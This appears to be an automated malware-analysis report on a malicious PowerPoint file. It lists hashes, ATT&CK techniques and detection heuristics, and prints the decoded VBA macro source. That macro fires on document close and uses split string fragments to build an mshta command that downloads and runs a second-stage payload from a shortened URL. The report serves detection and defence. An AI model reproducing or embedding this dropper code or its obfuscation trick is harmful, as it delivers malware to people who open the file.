Malicious Office (OLE) / .PPT — malware analysis report

Static analysis result for SHA-256 0d838d8636a88e63…

MALICIOUS

Office (OLE) / .PPT

75.5 KB Created: 2020-11-19 22:03:29 Authoring application: Microsoft Office PowerPoint First seen: 2026-05-13
MD5: c58976da0ef0f00fa982bc6ce01809c0 SHA-1: e97289611ed14768b9875c3425f2a4a25b19b7cd SHA-256: 0d838d8636a88e63e0a6ed863f1bc32e5a95d8b835cc509a497dfb15fd540f82
130 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains VBA macros, including an Auto_Close macro, which is a common technique for executing malicious code upon document closure. The script constructs a URL by concatenating string literals and uses the Shell function to execute it, likely downloading and running a second-stage payload. The constructed URL is http://%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40@j.mp/djkaaahdasdhkasjasdhksdbhd.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell maviya1
  • Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URL
    A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    AUtO_ClOsE()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40@j.mp/djkaaahdasdhkasjasdhksdbhd Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1503 bytes
SHA-256: 8345cb22770a79cfb36baa20e5983998d66f1c375ae793e1d67be6751191eb2d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "sexy"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit

Sub hhhhh()

lol.Show

End Sub



Attribute VB_Name = "tutulpiii"
Function maviya1() As String

maviya2 = "m"


maviya1 = maviya2 + maviya3 + lahab
End Function

Attribute VB_Name = "hithithit"
Function maviya3()
yadeez1 = "s"
yadeez2 = "h"
yadeez3 = "t" + "a h" + "t"

maviya3 = yadeez1 + yadeez2 + yadeez3
End Function


Attribute VB_Name = "hullll"
Option Explicit

Sub _
AUtO_ClOsE()

Dim kasdok As sexy
Set kasdok = New sexy
With kasdok
End With

kasdok.hhhhh

End Sub

Attribute VB_Name = "lol"
Attribute VB_Base = "0{0912433B-95BC-45DF-8D58-BFA9C146EEFA}{C20D8037-E631-47F8-B93A-0DA16545D457}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Option Explicit
Private Sub UserForm_Terminate()
Shell maviya1
End Sub


Attribute VB_Name = "putter"

Function lahab() As String



lahab1 = "tp://%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40@j.mp/"


lahab2 = "djka" + "aah" + "dasdhkasj" + "asdhksdb" + "hd"


lahab = lahab1 + lahab2
End Function